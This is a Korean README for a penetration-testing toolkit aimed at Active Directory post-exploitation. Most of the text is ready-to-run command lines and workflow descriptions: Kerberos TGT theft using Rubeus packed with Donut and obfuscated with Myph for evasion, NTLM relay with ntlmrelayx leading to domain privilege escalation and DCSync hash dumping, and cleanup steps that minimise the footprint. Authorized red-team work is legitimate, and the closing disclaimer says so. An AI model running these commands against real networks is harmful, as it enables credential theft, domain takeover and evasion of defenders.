
Kerberos 티켓 추출, NTLM 릴레이 공격, NetExec, Impacket, Donut 통합을 통한 측면 이동을 위한 자동화된 Active Directory 사후 침투 도구 키트.
이 저장소는 Active Directory 환경 내에서 보안 평가 및 침투 테스트를 위해 설계된 Python 오케스트레이터 스크립트 모음입니다. 이 도구는 손상된 워크스테이션 또는 서버에서 이미 로컬 관리자 접근 권한이 확보된 사후 침투 시나리오에 특화되어 있으며, 목표는 광범위한 Active Directory 도메인으로의 측면 이동 또는 권한 상승을 수행하는 것입니다.
NetExec, Impacket, Donut, BloodyAD와 같은 일반적인 보안 유틸리티를 포함한 워크플로를 자동화함으로써, 이 스크립트들은 복잡한 다단계 프로세스를 반복 가능한 단일 명령어 작업으로 간소화합니다.
스크립트는 다음 도구가 호스트 시스템에 설치되어 있고 시스템의 PATH에서 사용 가능해야 합니다:
nxc)impacket-ntlmrelayx, impacket-secretsdump, impacket-ticketConverter)awk, base64향상된 콘솔 출력 형식을 위해 다음 패키지를 설치하세요:
pip install colorama rich
harpyTGT.py)이 스크립트는 로그인된 Windows 세션에서 Kerberos 티켓 부여 티켓(TGT)을 추출하고 Linux 호환 ccache 형식으로 변환하는 프로세스를 자동화합니다.
Rubeus.exe 셸코드 페이로드를 생성하고, Myph로 난독화를 적용한 후, 예약된 작업(schtask_as) 또는 mmcexec을 사용하여 결과 바이너리를 대상 호스트에서 실행합니다.표준 실행 (대상 사용자에게 관리 권한이 있는 경우):
./harpyTGT.py -t <TARGET_IP> -u <LOCAL_ADMIN_USER> -p <LOCAL_ADMIN_PASS> -U <TARGET_USER> -r </path/to/Rubeus.exe>

대체 실행 (대상 사용자에게 관리 권한이 없는 경우):
./harpyTGT.py -t <TARGET_IP> -u <LOCAL_ADMIN_USER> -p <LOCAL_ADMIN_PASS> -U <TARGET_USER> -r </path/to/Rubeus.exe> --no-target-admin --attacker-ip <ATTACKER_IP>

harpyRelay.py)이 스크립트는 도메인 컨트롤러에서 잘못 구성된 SMB 또는 LDAP 서명 정책을 대상으로 NTLM 릴레이 공격을 조율하여 도메인 전체 권한 상승 또는 NTDS 데이터베이스 덤프(DCSync)를 달성합니다.
ntlmrelayx 리스너를 실행하고, NetExec를 통해 손상된 클라이언트에서 인증 요청을 트리거하며, 성공적인 익스플로잇을 위해 출력을 모니터링하고 도메인 해시를 덤프합니다. 이 도구에는 대상 도메인에 대한 발자국을 최소화하기 위한 자동 정리 루틴이 포함되어 있습니다.LDAPS 흐름 (표준):
./harpyRelay.py--target-host <CLIENT_IP> --local-user <LOCAL_ADMIN> --local-pass <LOCAL_PASS> --domain-admin-user <DOMAIN_ADMIN> --attacker-ip <ATTACKER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL>
LDAP 흐름 (LDAPS를 사용할 수 없는 경우의 대체 흐름):
./harpyRelay.py --target-host <CLIENT_IP> --local-user <LOCAL_ADMIN> --local-pass <LOCAL_PASS> --domain-admin-user <DOMAIN_ADMIN> --attacker-ip <ATTACKER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL> --no-ldaps

stealTGTNetExec (nxc) 를 위한 사용자 정의 모듈로, 대상 머신에서 특정 로그온 사용자의 Kerberos 티켓 부여 티켓(TGT)을 추출하도록 설계되었습니다.
이 모듈은 mmcexec를 통해 SYSTEM 권한으로 상호작용하며, 회피형 페이로드(Rubeus를 Donut 및 Myph로 캡슐화) 생성, 메모리 내 실행, Base64 티켓 출력 캡처 및 Linux에서 사용 가능한 .ccache 파일로의 투명한 변환을 자동화합니다.
모듈은 자동으로 다음 유틸리티가 설치되어 있고 $PATH에서 사용 가능한지 확인합니다:
donutmyphimpacket-ticketConverter외부 모듈을 NetExec에 로드하려면 stealTGT.py 스크립트를 로컬 NetExec 모듈 디렉토리에 복사하세요:
cp stealTGT.py ~/.nxc/modules/
netexec smb <TARGET_IP> -u <ADMIN_USER> -p <ADMIN_PASS> --local-auth -M stealTGT -o USER=<TARGET_USER> RUBEUS=/path/to/Rubeus.exe
모듈 옵션 (-o):
USER: TGT를 추출하려는 현재 로그온 세션의 사용자 이름 (예: jdoe).RUBEUS: 공격자 머신에서 정식 Rubeus.exe 바이너리가 위치한 로컬 경로.
bloodyad 또는 netexec를 통해 자동으로 제거를 시도합니다.중요 알림: 이 저장소는 승인된 보안 감사, 취약점 연구 및 교육 목적으로만 사용됩니다. 사전에 명시적인 서면 승인 없이 프로덕션 인프라에서 이러한 도구를 실행하는 것은 엄격히 금지됩니다. 저자는 이 소프트웨어 배포로 인한 오용, 부수적 피해 또는 법적 결과에 대해 어떠한 책임도 지지 않습니다.